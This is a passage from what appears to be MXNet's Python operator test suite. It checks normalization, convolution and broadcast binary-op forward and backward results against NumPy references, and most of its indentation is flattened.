dX.asnumpy(), atol=atol, rtol=rtol)
assert_almost_equal(
bn_gamma.grad.asnumpy(), dW.asnumpy(), atol=atol, rtol=rtol)
assert_almost_equal(
bn_beta.grad.asnumpy(), db.asnumpy(), atol=atol, rtol=rtol)
for op in [mx.nd.BatchNorm, mx.nd.contrib.SyncBatchNorm]:
for shape in [(24, 2), (24, 3, 4), (24, 4, 4, 4), (24, 8, 4, 4), (24, 5, 6, 4, 4)]:
for axis in range(len(shape)):
for cudnn_off in [False, True]:
for output_mean_var in [False, True]:
_test_batchnorm_impl(op, shape, axis,
cudnn_off, output_mean_var)
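# Illustrative sketch (assumption added for readability, not part of the
# original tests): the reference normalization that the loop above reproduces
# with exclude-axis reductions, shown in plain NumPy for a 2-D input normalized
# over the batch axis.
def _sketch_batchnorm_forward(x, gamma, beta, eps=1e-5):
    import numpy as np
    mean = x.mean(axis=0)
    var = x.var(axis=0)
    return gamma * (x - mean) / np.sqrt(var + eps) + beta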
@with_seed()
def test_groupnorm():
acc_types = {'float16': 'float32', 'float32': 'float64', 'float64': 'float64'}
def x_hat_helper(x, num_groups, eps):
dtype = x.dtype
dshape = x.shape
assert len(dshape) == 4
acc_type = acc_types[str(dtype)]
new_shape = (dshape[0], num_groups, int(dshape[1] / num_groups), dshape[2], dshape[3])
new_moments_shape = (dshape[0], num_groups, 1, 1, 1)
data = x.reshape(new_shape)
mean = np.mean(data, axis=(2, 3, 4), keepdims=False, dtype=acc_type).astype(dtype)
std = np.sqrt(np.var(data, axis=(2, 3, 4), dtype=acc_type, keepdims=False).astype(dtype) + eps)
x_hat = (data - mean.reshape(new_moments_shape)) / std.reshape(new_moments_shape)
return x_hat, mean, std
def np_groupnorm(data, gamma, beta, num_groups, eps):
new_param_shape = (1, num_groups, 1, 1, 1)
x_hat, mean, std = x_hat_helper(data, num_groups, eps)
out = x_hat * gamma.reshape(new_param_shape) + beta.reshape(new_param_shape)
        # Reshape back to the original (N, C, H, W) layout of the input.
        return out.reshape(data.shape), mean, std
def np_groupnorm_grad(ograd, data, gamma, beta, mean, std, num_groups, eps):
x_hat, mean, std = x_hat_helper(data, num_groups, eps)
new_shape = x_hat.shape
dshape = data.shape
dtype = data.dtype
new_moments_shape = (new_shape[0], num_groups, 1, 1, 1)
new_param_shape = (1, num_groups, 1, 1, 1)
acc_type = acc_types[str(dtype)]
ograd = ograd.reshape(new_shape)
data = data.reshape(new_shape)
gamma = gamma.reshape(new_param_shape)
beta = beta.reshape(new_param_shape)
mean = mean.reshape(new_moments_shape)
std = std.reshape(new_moments_shape)
beta_grad = np.sum(ograd, axis=(0, 2, 3, 4), dtype=acc_type, keepdims=False).astype(dtype)
gamma_grad = np.sum(x_hat * ograd, axis=(0, 2, 3, 4), dtype=acc_type, keepdims=False).astype(dtype)
x_hat_grad = ograd * gamma
ograd_mult = x_hat_grad / std
red_out = np.mean(ograd_mult, axis=(2, 3, 4), dtype=acc_type, keepdims=True).astype(dtype)
data_grad = ograd_mult - red_out
red_out = np.mean(ograd_mult * x_hat, axis=(2, 3, 4), dtype=acc_type, keepdims=True).astype(dtype)
data_grad = data_grad - x_hat * red_out
return data_grad.reshape(dshape), gamma_grad, beta_grad
batch_size = random.randint(1, 8)
num_groups = random.randint(2, 3)
num_channels = random.randint(2, 3) * num_groups
height = random.randint(1, 5)
width = random.randint(1, 5)
dshape = (batch_size, num_channels, height, width)
param_shape = (num_groups,)
temp_shape = (batch_size, num_groups, int(num_channels / num_groups), height, width)
np_data = np.random.uniform(0.2, 1.0, dshape)
np_gamma = np.random.uniform(-1.0, 1.0, param_shape)
np_beta = np.random.uniform(-1.0, 1.0, param_shape)
data_sym = mx.sym.Variable("data")
gamma_sym = mx.sym.Variable("gamma")
beta_sym = mx.sym.Variable("beta")
for dtype in [np.float16, np.float32, np.float64]:
eps = 1e-2 if dtype == np.float16 else 1e-5
mx_data = mx.nd.array(np_data, dtype=dtype)
mx_gamma = mx.nd.array(np_gamma, dtype=dtype)
mx_beta = mx.nd.array(np_beta, dtype=dtype)
np_out, np_mean, np_std = np_groupnorm(np_data.astype(dtype),
np_gamma.astype(dtype),
np_beta.astype(dtype),
num_groups=num_groups,
eps=eps)
mx_sym = mx.sym.GroupNorm(data=data_sym, gamma=gamma_sym, beta=beta_sym,
num_groups=num_groups, eps=eps, output_mean_var=True)
check_symbolic_forward(mx_sym, [mx_data, mx_gamma, mx_beta], [np_out, np_mean, np_std],
rtol=1e-2 if dtype == np.float16 else 1e-3,
atol=5e-3 if dtype == np.float16 else 1e-4, dtype=dtype)
mx_sym = mx.sym.GroupNorm(data=data_sym, gamma=gamma_sym, beta=beta_sym,
num_groups=num_groups, eps=eps, output_mean_var=False)
np_ograd = np.random.uniform(-1.0, 1.0, dshape).astype(dtype)
np_data_grad, np_gamma_grad, np_beta_grad = np_groupnorm_grad(np_ograd,
np_data.astype(dtype),
np_gamma.astype(dtype),
np_beta.astype(dtype),
np_mean, np_std,
num_groups, eps)
check_symbolic_backward(mx_sym, [mx_data, mx_gamma, mx_beta], [mx.nd.array(np_ograd)],
[np_data_grad, np_gamma_grad, np_beta_grad],
rtol=1e-2 if dtype == np.float16 else 1e-3,
atol=5e-2 if dtype == np.float16 else 1e-4, dtype=dtype)
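# Illustrative sketch (an assumption for clarity, not part of the original
# tests): with num_groups == 1 the group statistics computed above cover all of
# (C, H, W) per sample, i.e. GroupNorm degenerates to LayerNorm over those axes;
# with num_groups == C it degenerates to InstanceNorm.
def _sketch_groupnorm_single_group(x, eps=1e-5):
    import numpy as np
    mean = x.mean(axis=(1, 2, 3), keepdims=True)
    std = np.sqrt(x.var(axis=(1, 2, 3), keepdims=True) + eps)
    return (x - mean) / std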
@with_seed()
def test_convolution_grouping():
for dim in [1, 2, 3]:
num_filter = 4
for num_group in [1, 2]:
kernel = (3,) * dim
shape = (1, 4) + (9,) * dim
x = mx.sym.Variable('x')
w = mx.sym.Variable('w')
b = mx.sym.Variable('b')
y1 = mx.sym.Convolution(data=x, weight=w, bias=b, num_filter=num_filter, num_group=num_group, kernel=kernel)
xslice = mx.sym.SliceChannel(data=x, num_outputs=num_group, axis=1)
wslice = mx.sym.SliceChannel(data=w, num_outputs=num_group, axis=0)
bslice = mx.sym.SliceChannel(data=b, num_outputs=num_group, axis=0)
y2 = mx.sym.Concat(*[mx.sym.Convolution(data=xslice[i], weight=wslice[i], bias=bslice[i],
num_filter=num_filter//num_group, kernel=kernel)
for i in range(num_group)])
exe1 = y1.simple_bind(default_context(), x=shape)
exe2 = y2.simple_bind(default_context(), x=shape, w=(num_filter, shape[1]//num_group) + kernel, b=(num_filter,))
for arr1, arr2 in zip(exe1.arg_arrays, exe2.arg_arrays):
arr1[:] = np.float32(np.random.normal(size=arr1.shape))
arr2[:] = arr1
exe1.forward(is_train=True)
exe1.backward(exe1.outputs[0])
exe2.forward(is_train=True)
exe2.backward(exe2.outputs[0])
for arr1, arr2 in zip(exe1.outputs + exe1.grad_arrays, exe2.outputs + exe2.grad_arrays):
np.testing.assert_allclose(arr1.asnumpy(), arr2.asnumpy(), rtol=1e-3, atol=1e-3)
@unittest.skip("Flaky test https://github.com/apache/incubator-mxnet/issues/14052")
@with_seed()
def test_depthwise_convolution():
for dim in [1,2]:
for num_base in [1, 4, 16, 32, 64]:
for kernel_x in [3, 5]:
for stride_x in [1, 2]:
for pad_x in [0, 1]:
for in_size in [7, 32]:
kernel = (kernel_x,) * dim
stride = (stride_x,) * dim
pad = (pad_x,) * dim
num_filter = num_base
num_group = num_base
shape = (2, num_base) + (in_size,) * dim
x = mx.sym.Variable('x')
w = mx.sym.Variable('w')
b = mx.sym.Variable('b')
y1 = mx.sym.Convolution(data=x, weight=w, bias=b, num_filter=num_filter, num_group=num_group,
kernel=kernel, stride=stride, pad=pad)
xslice = mx.sym.SliceChannel(data=x, num_outputs=num_group, axis=1)
wslice = mx.sym.SliceChannel(data=w, num_outputs=num_group, axis=0)
bslice = mx.sym.SliceChannel(data=b, num_outputs=num_group, axis=0)
y2 = mx.sym.Concat(*[mx.sym.Convolution(data=xslice[i], weight=wslice[i], bias=bslice[i],
num_filter=num_filter//num_group, kernel=kernel,
stride=stride, pad=pad)
for i in range(num_group)])
dev = default_context()
exe1 = y1.simple_bind(dev, x=shape)
exe2 = y2.simple_bind(dev, x=shape, w=(num_filter, shape[1]//num_group)+kernel,
b=(num_filter,))
for arr1, arr2 in zip(exe1.arg_arrays, exe2.arg_arrays):
arr1[:] = np.random.normal(size=arr1.shape)
arr2[:] = arr1
exe1.forward(is_train=True)
exe1.backward(exe1.outputs[0])
exe2.forward(is_train=True)
exe2.backward(exe2.outputs[0])
for arr1, arr2 in zip(exe1.outputs + exe1.grad_arrays, exe2.outputs + exe2.grad_arrays):
assert_allclose(arr1, arr2, rtol=1e-3, atol=1e-3)
@with_seed()
def test_convolution_independent_gradients():
# NOTE(zixuanweeei): Flaky test tracked by https://github.com/apache/incubator-mxnet/issues/15603.
# GPU context will be enabled after figuring out the possible issue tracked at
# https://github.com/apache/incubator-mxnet/issues/15638.
ctx = mx.cpu()
atol = 1.0e-3
rtol = 1.0e-3
reqs = ["null", "write", "add"]
var_names = ["x", "w", "b"]
dims = [1, 2]
num_bases = [1, 8]
kernel_xs = [3, 5]
stride_xs = [1, 2]
pad_xs = [0, 1]
in_sizes = [7, 32]
no_biases = [True, False]
for dim, num_base, kernel_x, stride_x, pad_x , in_size, no_bias in \
itertools.product(dims, num_bases, kernel_xs, stride_xs, pad_xs, in_sizes, no_biases):
# Prepare params shape
kernel = (kernel_x,) * dim
stride = (stride_x,) * dim
pad = (pad_x,) * dim
num_filter = num_base
x_shape = (2, num_base) + (in_size,) * dim
w_shape = (num_filter, num_base) + kernel
# Symbols definition
x = mx.sym.Variable('x')
w = mx.sym.Variable('w')
b = mx.sym.Variable('b') if not no_bias else None
conv = mx.sym.Convolution(x, w, b, num_filter=num_filter,
kernel=kernel, stride=stride, pad=pad, no_bias=no_bias)
for req_kind in reqs:
# Binding args for conv with possible dependent gradients
base_args = {
'x': mx.nd.random.normal(shape=x_shape, ctx=ctx),
'w': mx.nd.random.normal(shape=w_shape, ctx=ctx),
'b': mx.nd.random.normal(shape=(num_filter, ), ctx=ctx) if not no_bias else None}
args1 = copy.deepcopy(base_args)
grad1 = {
'x': mx.nd.zeros(shape=x_shape, ctx=ctx),
'w': mx.nd.zeros(shape=w_shape, ctx=ctx),
'b': mx.nd.zeros(shape=(num_filter, ), ctx=ctx) if not no_bias else None}
grad_req1 = [req_kind] * 3
grad_req1 = dict(zip(var_names, grad_req1))
exe1 = conv.bind(ctx, args1, args_grad=grad1, grad_req=grad_req1)
exe1.forward(is_train=True)
exe1.backward(exe1.outputs[0])
for x_req, w_req, b_req in itertools.product(reqs, repeat=3):
# Binding args for conv with independent gradients
args2 = copy.deepcopy(base_args) # Deepcopy the same params of `exe1`
grad2 = {
'x': mx.nd.zeros(shape=x_shape, ctx=ctx),
'w': mx.nd.zeros(shape=w_shape, ctx=ctx),
'b': mx.nd.zeros(shape=(num_filter, ), ctx=ctx) if not no_bias else None}
grad_req2 = {"x": x_req, "w": w_req, "b": b_req}
exe2 = conv.bind(ctx, args2, args_grad=grad2, grad_req=grad_req2)
exe2.forward(is_train=True)
np.testing.assert_allclose(exe1.outputs[0].asnumpy(),
exe2.outputs[0].asnumpy(), rtol=rtol, atol=atol)
exe2.backward(exe2.outputs[0])
for var_name in var_names:
if var_name == "b" and no_bias:
continue
if grad_req2[var_name] == "null":
exe2_var_grad = grad2[var_name].asnumpy()
np.testing.assert_allclose(exe2_var_grad,
np.zeros_like(exe2_var_grad), rtol=rtol, atol=atol)
if grad_req2[var_name] != grad_req1[var_name]:
continue
np.testing.assert_allclose(args1[var_name].asnumpy(),
args2[var_name].asnumpy(), rtol=rtol, atol=atol)
np.testing.assert_allclose(grad1[var_name].asnumpy(),
grad2[var_name].asnumpy(), rtol=rtol, atol=atol)
def gen_broadcast_data(idx):
# Manually set test cases
binary_op_data_shape = np.array(
[[[2, 5, 1, 30, 7], [1, 5, 448, 30, 1]],
[[10, 49, 1, 77, 17], [10, 1, 2, 1, 17]],
[[13, 2, 65, 2, 1], [13, 1, 65, 1, 225]],
[[9, 434, 4, 2, 37], [9, 1, 4, 1, 37]],
[[2, 52, 1, 4, 1], [1, 52, 60, 1, 37]],
[[1, 23, 7, 122, 50], [2, 1, 7, 1, 50]],
[[1, 17, 1, 5, 1], [22, 1, 2, 1, 28]],
[[29, 1, 2, 1, 8], [29, 22, 1, 130, 1]],
[[2, 36, 1, 427, 3], [1, 36, 11, 427, 1]],
[[1, 2, 1, 100, 7], [1, 2, 448, 100, 1]],
[[1, 2, 495, 77, 7], [1, 2, 1, 1, 7]],
[[1, 43, 65, 2, 1], [1, 43, 65, 1, 225]],
[[1, 92, 434, 2, 2], [1, 92, 1, 2, 2]],
[[1, 92, 1, 4, 1], [1, 92, 134, 1, 17]],
[[1, 53, 2, 122, 143], [1, 1, 2, 1, 143]],
[[1, 179, 1, 87, 17], [1, 179, 1, 1, 17]],
[[1, 1, 17, 5, 1], [1, 22, 1, 1, 28]],
[[1, 2, 1, 1, 8], [1, 2, 52, 430, 1]],
[[1, 163, 1, 22, 3], [1, 163, 116, 22, 1]],
[[1, 1, 44, 30, 7], [1, 1, 44, 30, 1]],
[[1, 1, 1, 1, 28], [1, 127, 1, 5, 28]],
[[1, 2, 394, 38, 1], [1, 2, 394, 38, 16]],
[[1, 10, 49, 77, 17], [1, 1, 1, 1, 17]],
[[1, 431, 6, 2, 225], [1, 1, 6, 2, 225]],
[[1, 15, 1, 28, 1], [1, 15, 1, 28, 463]],
[[1, 129, 2, 48, 96], [1, 129, 2, 1, 1]],
[[1, 1, 403, 17, 2], [1, 44, 403, 17, 2]],
[[1, 1, 65, 2, 22], [1, 1, 65, 1, 1]],
[[1, 24, 103, 17, 18], [1, 24, 1, 1, 1]],
[[1, 1, 1, 1, 2], [1, 24, 194, 50, 1]],
[[1, 1, 107, 84, 9], [1, 1, 1, 1, 1]]])
if idx < binary_op_data_shape.shape[0]:
l_shape = binary_op_data_shape[idx][0]
r_shape = binary_op_data_shape[idx][1]
else:
        # Generate random data with ndim between 1 and 5 and all shape dims between 1 and 5
ndim = np.random.randint(1, 6)
shape = np.random.randint(1, 6, size=(ndim,))
l_same_dim = np.random.randint(0, 5)
r_same_dim = np.random.randint(0, 5)
l_axis_flags = np.random.randint(0, 2, size=ndim)
r_axis_flags = np.random.randint(0, 2, size=ndim)
if l_same_dim == 4:
l_axis_flags = np.ones(ndim)
if r_same_dim == 4:
r_axis_flags = np.ones(ndim)
l_shape = shape.copy()
r_shape = shape.copy()
l_shape[np.where(l_axis_flags == 0)] = 1
r_shape[np.where(r_axis_flags == 0)] = 1
return [np.random.random(l_shape), np.random.random(r_shape)]
def gen_broadcast_data_int(idx):
    d = gen_broadcast_data(idx)
return [np.round(d[0]*100).astype(int), np.round(d[1]*100).astype(int)]
def gen_binary_data(dummy):
ndim = np.random.randint(1, 6)
shape = np.random.randint(1, 6, size=(ndim,))
#print("gen shape {}".format(shape))
return [np.random.random(shape), np.random.random(shape)]
def gen_binary_data_int(dummy):
    d = gen_binary_data(dummy)
return [np.round(d[0]*100).astype(int), np.round(d[1]*100).astype(int)]
def check_binary_op_forward(symbol, baseline, gen_data, rtol=1e-3, atol=1e-5, mx_nd_func=None):
sample_num = 200
for i in range(sample_num):
d = gen_data(i)
y = symbol.bind(default_context(), args={'a': mx.nd.array(d[0]), 'b': mx.nd.array(d[1])})
y.forward(is_train=True)
y = y.outputs[0].asnumpy()
x = baseline(d[0], d[1]).astype(y.dtype)
#np.set_printoptions(precision=20)
a = d[0]
b = d[1]
#print("a: {} {}".format(a.dtype, a))
#print("a: {} {}".format(b.dtype, b))
#print("x: {} {}".format(x.dtype, x))
#print("y: {} {}".format(y.dtype, y))
if mx_nd_func is not None:
d0 = mx.nd.array(d[0], dtype=d[0].dtype)
d1 = mx.nd.array(d[1], dtype=d[1].dtype)
assert_almost_equal(y, mx_nd_func(d0, d1).asnumpy(), rtol=rtol, atol=atol)
idx = np.abs(x-y) > atol+rtol*np.abs(x)
if idx.any():
import binascii
np.set_printoptions(precision=20)
logging.error('found precision problem:')
d[0] = np.broadcast_to(d[0], x.shape)
d[1] = np.broadcast_to(d[1], x.shape)
logging.error('input a: {}'.format(d[0][idx]))
logging.error('input b: {}'.format(d[1][idx]))
logging.error("output x: {} {}".format(x.dtype, x))
logging.error("output y: {} {}".format(y.dtype, y))
def ftohex(xs):
import struct
return list(map(lambda x: binascii.hexlify(struct.pack('d', x)), xs.flatten()))
logging.error('output x in baseline(a, b): {}'.format(x[idx]))
logging.error('output y in symbol(a, b): {}'.format(y[idx]))
logging.error('output x in baseline(a,b) hex: {}'.format(ftohex(x[idx])))
logging.error('output y in symbol(a,b) hex: {}'.format(ftohex(y[idx])))
logging.error('input a hex: {}'.format(ftohex(d[0][idx])))
logging.error('input a hex: {}'.format(ftohex(d[1][idx])))
logging.error('diff: {}'.format(np.abs(x-y)[idx] - atol-rtol*np.abs(x)[idx]))
assert_allclose(y, x, rtol=rtol, atol=atol)
def check_binary_op_backward(symbol, baseline, gen_data, rtol=1e-3, atol=1e-5):
sample_num = 200
for i in range(sample_num):
d = gen_data(i)
out = np.random.random((d[0] + d[1]).shape)
def reduce_op(shape, x):
if shape == x.shape:
return x
keepdims_shape = list(x.shape)
for i in range(len(shape)):
if x.shape[i] != shape[i]:
keepdims_shape[i] = 1
x = np.sum(x, axis=i).reshape(keepdims_shape)
return x
baseline_grad1, baseline_grad2 = baseline(out, d[0], d[1])
x_1 = reduce_op(d[0].shape, baseline_grad1)
x_2 = reduce_op(d[1].shape, baseline_grad2)
y_1 = mx.nd.empty(d[0].shape)
y_2 = mx.nd.empty(d[1].shape)
y = symbol.bind(default_context(), args={'a': mx.nd.array(d[0]), 'b': mx.nd.array(d[1])},
args_grad=[y_1, y_2])
y.forward(is_train=True)
y.backward([mx.nd.array(out)])
assert_allclose(y_1.asnumpy(), x_1, rtol=rtol, atol=atol)
assert_allclose(y_2.asnumpy(), x_2, rtol=rtol, atol=atol)
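# Illustrative sketch (not part of the original helpers): why reduce_op above
# sums the dense gradient back down to each input's shape - an input axis of
# size 1 that was broadcast in the forward pass corresponds to a sum over that
# axis in the backward pass.
def _sketch_broadcast_grad_reduction():
    import numpy as np
    g_out = np.ones((3, 4))                     # upstream gradient of broadcast_add(a, b)
    g_b = g_out.sum(axis=1, keepdims=True)      # b had shape (3, 1)
    assert g_b.shape == (3, 1)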
@with_seed()
def test_binary_op():
a = mx.sym.Variable('a')
b = mx.sym.Variable('b')
def test_bplus(a, b):
c = a + b
check_binary_op_forward(c, lambda a, b: a + b, gen_binary_data)
check_binary_op_backward(c, lambda g_out, a, b: (g_out, g_out), gen_binary_data)
def test_bminus(a, b):
c = a - b
check_binary_op_forward(c, lambda a, b: a - b, gen_binary_data)
check_binary_op_backward(c, lambda g_out, a, b: (g_out, - g_out), gen_binary_data)
def test_bmul(a, b):
c = a * b
check_binary_op_forward(c, lambda a, b: a * b, gen_binary_data)
check_binary_op_backward(c, lambda g_out, a, b: (g_out * b, g_out * a), gen_binary_data)
def test_bdiv(a, b):
c = a / b
check_binary_op_forward(c, lambda a, b: a / b, gen_binary_data)
check_binary_op_backward(c, lambda g_out, a, b: (g_out / b, - g_out * a / (b * b)), gen_binary_data)
def test_bmod(a, b):
# Python and numpy operate only in double so to avoid numerical errors we have to use
# doubles as well. This was a flaky test before when using float32. seed 1688524483, 1768433044
#c = a % b
c = mx.sym.cast(a, dtype='float64') % mx.sym.cast(b, dtype='float64')
# '%' is sensitive to the precision of the calculation. Force numpy to match mxnet's float32.
check_binary_op_forward(c, lambda a, b: np.float32(a) % np.float32(b), gen_binary_data, rtol=0, atol=0)
check_binary_op_backward(c,
lambda g_out, a, b: (g_out, - g_out * (np.float32(a) // np.float32(b))), gen_binary_data)
def test_bmod_int(a, b):
c = mx.sym.cast(a, dtype='int32') % mx.sym.cast(b, dtype='int32')
check_binary_op_forward(c, lambda a, b: a % b, gen_binary_data_int)
check_binary_op_backward(c, lambda g_out, a, b: (np.zeros_like(a), np.zeros_like(b)), gen_binary_data_int)
def test_bpow(a, b):
c = a ** b
check_binary_op_forward(c, lambda a, b: a ** b, gen_binary_data)
check_binary_op_backward(c, lambda g_out, a, b: (g_out * a **(b - 1) * b,
g_out * a ** b * np.log(a)), gen_binary_data)
def test_bneq(a, b):
c = a != b
# '!=' is sensitive to the precision of the comparison. Force numpy to match mxnet's float32.
# Issue exposed with seed 1644387363
check_binary_op_forward(c, lambda a, b: (np.float32(a) != np.float32(b)).astype(a.dtype), gen_binary_data)
check_binary_op_backward(c, lambda g_out, a, b: (np.zeros_like(a), np.zeros_like(b)), gen_binary_data)
test_bplus(a, b)
test_bminus(a, b)
test_bmul(a, b)
test_bdiv(a, b)
test_bmod(a, b)
test_bmod_int(a, b)
test_bpow(a, b)
test_bneq(a, b)
@with_seed()
def test_broadcast_binary_op():
def check_bmaxmin_gradient(test_sym, x, y, delta, rtol, atol):
"""This function ensures that checking the numerical gradient of
broadcast_max/min is not crossing the boundary y=x where there
is no gradient definition at those sigularities."""
x_max = np.max(x)
y = x_max + 2 * delta + np.random.random(y.shape)
check_numeric_gradient(test_sym, [x, y], numeric_eps=delta, rtol=rtol, atol=atol)
x_min = np.min(x)
y = x_min - 2 * delta - np.random.random(y.shape)
check_numeric_gradient(test_sym, [x, y], numeric_eps=delta, rtol=rtol, atol=atol)
a = mx.sym.Variable('a')
b = mx.sym.Variable('b')
def test_bplus(a, b):
c = mx.sym.broadcast_plus(a, b)
check_binary_op_forward(c, lambda a, b: a + b, gen_broadcast_data, mx_nd_func=mx.nd.add)
check_binary_op_backward(c, lambda g_out, a, b: (g_out, g_out), gen_broadcast_data)
def test_bminus(a, b):
c = mx.sym.broadcast_minus(a, b)
check_binary_op_forward(c, lambda a, b: a - b, gen_broadcast_data, mx_nd_func=mx.nd.subtract)
check_binary_op_backward(c, lambda g_out, a, b: (g_out, - g_out), gen_broadcast_data)
def test_bmul(a, b):
c = mx.sym.broadcast_mul(a, b)
check_binary_op_forward(c, lambda a, b: a * b, gen_broadcast_data, mx_nd_func=mx.nd.multiply)
check_binary_op_backward(c, lambda g_out, a, b: (g_out * b, g_out * a), gen_broadcast_data)
def test_bdiv(a, b):
c = mx.sym.broadcast_div(a, b)
check_binary_op_forward(c, lambda a, b: a / b, gen_broadcast_data, mx_nd_func=mx.nd.divide)
check_binary_op_backward(c, lambda g_out, a, b: (g_out / b, - g_out * a / (b * b)), gen_broadcast_data)
def test_bmod(a_, b_):
# Python and numpy operate only in double so to avoid numerical errors we have to use
# doubles as well. This was a flaky test before when using float32. seed 1688524483, 1768433044
a = mx.sym.cast(a_, dtype='float64')
b = mx.sym.cast(b_, dtype='float64')
# '%' is sensitive to the precision of the calculation. Force numpy to match mxnet's float32.
c = mx.sym.broadcast_mod(a, b)
check_binary_op_forward(c, lambda a, b: a % b, gen_broadcast_data, atol=1, mx_nd_func=mx.nd.modulo)
check_binary_op_backward(c,
lambda g_out, a, b: (g_out, - g_out * (np.float32(a) // np.float32(b))), gen_binary_data)
def test_bmod_int(a, b):
c = mx.sym.broadcast_mod(mx.sym.cast(a, dtype='int32'), mx.sym.cast(b, dtype='int32'))
check_binary_op_forward(c, lambda a, b: a % b, gen_broadcast_data_int, mx_nd_func=mx.nd.modulo)
check_binary_op_backward(c, lambda g_out, a, b: (np.zeros_like(a), np.zeros_like(b)), gen_broadcast_data_int)
def test_bpow(a, b):
c = mx.sym.broadcast_power(a, b)
check_binary_op_forward(c, lambda a, b: a ** b, gen_broadcast_data, mx_nd_func=mx.nd.power)
check_binary_op_backward(c, lambda g_out, a, b: (g_out * a **(b - 1) * b,
g_out * a ** b * np.log(a)), gen_broadcast_data)
def test_bequal(a, b):
c = mx.sym.broadcast_equal(a, b)
check_binary_op_forward(c, lambda a, b: (a == b).astype(a.dtype), gen_broadcast_data_int,
mx_nd_func=mx.nd.equal)
check_binary_op_backward(c, lambda g_out, a, b: (np.zeros_like(a), np.zeros_like(b)), gen_broadcast_data_int)
def test_bmax(a, b):
c = mx.sym.broadcast_maximum(a, b)
check_binary_op_forward(c, lambda x, y: np.maximum(x, y), gen_broadcast_data, mx_nd_func=mx.nd.maximum)
# pass idx=200 to gen_broadcast_data so that generated ndarrays' sizes are not too big
data = gen_broadcast_data(idx=200)
check_bmaxmin_gradient(c, data[0], data[1], 0.001, 1e-2, 1e-3)
def test_bmin(a, b):
c = mx.sym.broadcast_minimum(a, b)
check_binary_op_forward(c, lambda x, y: np.minimum(x, y), gen_broadcast_data, mx_nd_func=mx.nd.minimum)
# pass idx=200 to gen_broadcast_data so that generated ndarrays' sizes are not too big
data = gen_broadcast_data(idx=200)
check_bmaxmin_gradient(c, data[0], data[1], 0.001, 1e-2, 1e-3)
def test_band(a, b):
c = mx.sym.broadcast_logical_and(a, b)
check_binary_op_forward(c, lambda x, y: np.logical_and(x, y), gen_broadcast_data, mx_nd_func=mx.nd.logical_and)
# pass idx=200 to gen_broadcast_data so that generated ndarrays' sizes are not too big
data = gen_broadcast_data(idx=200)
check_bmaxmin_gradient(c, data[0], data[1], 0.001, 1e-2, 1e-3)
def test_bor(a, b):
c = mx.sym.broadcast_logical_or(a, b)
check_binary_op_forward(c, lambda x, y: np.logical_or(x, y), gen_broadcast_data, mx_nd_func=mx.nd.logical_or)
# pass idx=200 to gen_broadcast_data so that generated ndarrays' sizes are not too big
data = gen_broadcast_data(idx=200)
check_bmaxmin_gradient(c, data[0], data[1], 0.001, 1e-2, 1e-3)
def test_bxor(a, b):
c = mx.sym.broadcast_logical_xor(a, b)
check_binary_op_forward(c, lambda x, y: np.logical_xor(x, y), gen_broadcast_data, mx_nd_func=mx.nd.logical_xor)
# pass idx=200 to gen_broadcast_data so that generated ndarrays' sizes are not too big
data = gen_broadcast_data(idx=200)
check_bmaxmin_gradient(c, data[0], data[1], 0.001, 1e-2, 1e-3)
test_bplus(a, b)
test_bminus(a, b)
test_bmul(a, b)
test_bdiv(a, b)
test_bmod(a, b)
test_bmod_int(a, b)
test_bpow(a, b)
test_bequal(a, b)
test_bmax(a, b)
test_bmin(a, b)
test_band(a, b)
test_bor(a, b)
test_bxor(a, b)
@with_seed()
def test_run_convolution_dilated_impulse_response(dil=(1,1), kernel_shape=(3,3), verbose=False):
dim = len(dil)
assert(len(kernel_shape) == dim)
# Input for spike response
data_size = 33
data_shape = (1, 1) + (data_size,) * dim
center = (0,0) + (data_size // 2,) * dim
spike_imgs = np.zeros(shape=data_shape, dtype=np.float32)
spike_imgs[center] = 1.0
spike_img = mx.nd.array(spike_imgs)
spike_img2 = mx.nd.array(spike_imgs)
kernel_weights = mx.nd.ones(shape=tuple([1,1]+list(kernel_shape)), dtype=np.float32)
kernel_weights2 = mx.nd.ones(shape=tuple([1,1]+list(kernel_shape)), dtype=np.float32)
kernel = mx.symbol.Variable('kernel')
in_img = mx.symbol.Variable('input')
net = mx.symbol.Convolution(in_img, num_filter=1,kernel=kernel_shape, dilate=dil, no_bias="true", name='test_convolution')
net.list_arguments()
be = net.bind(default_context(), args={ 'input' : spike_img, 'test_convolution_weight' : kernel_weights},
args_grad={'input' : spike_img2, 'test_convolution_weight' : kernel_weights2 } )
be.forward(True)
out_o = be.outputs[0].asnumpy()
ndo = be.outputs[0]
out_grads = np.zeros(shape=be.outputs[0].shape, dtype=np.float32)
out_grads[center] = 1.0
out_grad = mx.nd.array(out_grads)
be.backward([out_grad])
vgrad = be.grad_arrays[0].asnumpy()
out = out_o.reshape(out_o.shape[2:])
nz_loc = np.nonzero(out)
assert_allclose(np.sum(out),np.prod(kernel_shape),atol=1e-5)
assert_allclose(np.sum(vgrad),np.prod(kernel_shape),atol=1e-5)
# Now check whether the input gradient was computed correctly
input_grad = mx.nd.array(vgrad)
be = net.bind(default_context(), args={ 'input' : input_grad, 'test_convolution_weight' : kernel_weights})
be.forward(True)
out_o = be.outputs[0].asnumpy()
assert_allclose(out_o[center],np.prod(kernel_shape),atol=1e-5)
rnd_kernel_s = np.random.uniform(low=0.0, high=1.0, size=tuple([1,1]+list(kernel_shape))).astype(np.float32)
    impulse_error = mx.nd.array(out_o/np.sum(out_o)) # This should be 1.0 at the center of the output
rnd_kernel = mx.nd.array(rnd_kernel_s)
rnd_kernel2 = mx.nd.array(rnd_kernel_s)
white_in = mx.nd.ones(shape=data_shape)
white_in2 = mx.nd.ones(shape=data_shape)
be = net.bind(default_context(), args={ 'input' : white_in, 'test_convolution_weight' : rnd_kernel},
args_grad={'input' : white_in2, 'test_convolution_weight' : rnd_kernel2 } )
be.forward(True)
be.backward([impulse_error])
out_orig = be.outputs[0].asnumpy()
kernel_gradient = be.grad_arrays[1].asnumpy()
dkernel = mx.nd.array(rnd_kernel_s + kernel_gradient)
be = net.bind(default_context(), args={ 'input' : white_in, 'test_convolution_weight' : dkernel})
be.forward(True)
out = be.outputs[0].asnumpy()
# Now do a simple check of the kernel gradient
assert(out[center] - np.sum(kernel_gradient) - out_orig[center] < 0.001)
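# Illustrative sketch (not part of the original test): convolving a unit impulse
# with an all-ones kernel, as done above, yields an output whose total mass is
# the number of kernel elements, which is why the assertions compare against
# np.prod(kernel_shape).
def _sketch_impulse_response():
    import numpy as np
    kernel = np.ones(3)
    impulse = np.zeros(7)
    impulse[3] = 1.0
    out = np.convolve(impulse, kernel, mode='same')
    assert np.isclose(out.sum(), kernel.sum())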
@with_seed()
def test_convolution_dilated_impulse_response():
# 1D
for dil in [ (1,), (2,), (3,) ]:
for ks in [ (1,), (2,), (3,), (4,)]:
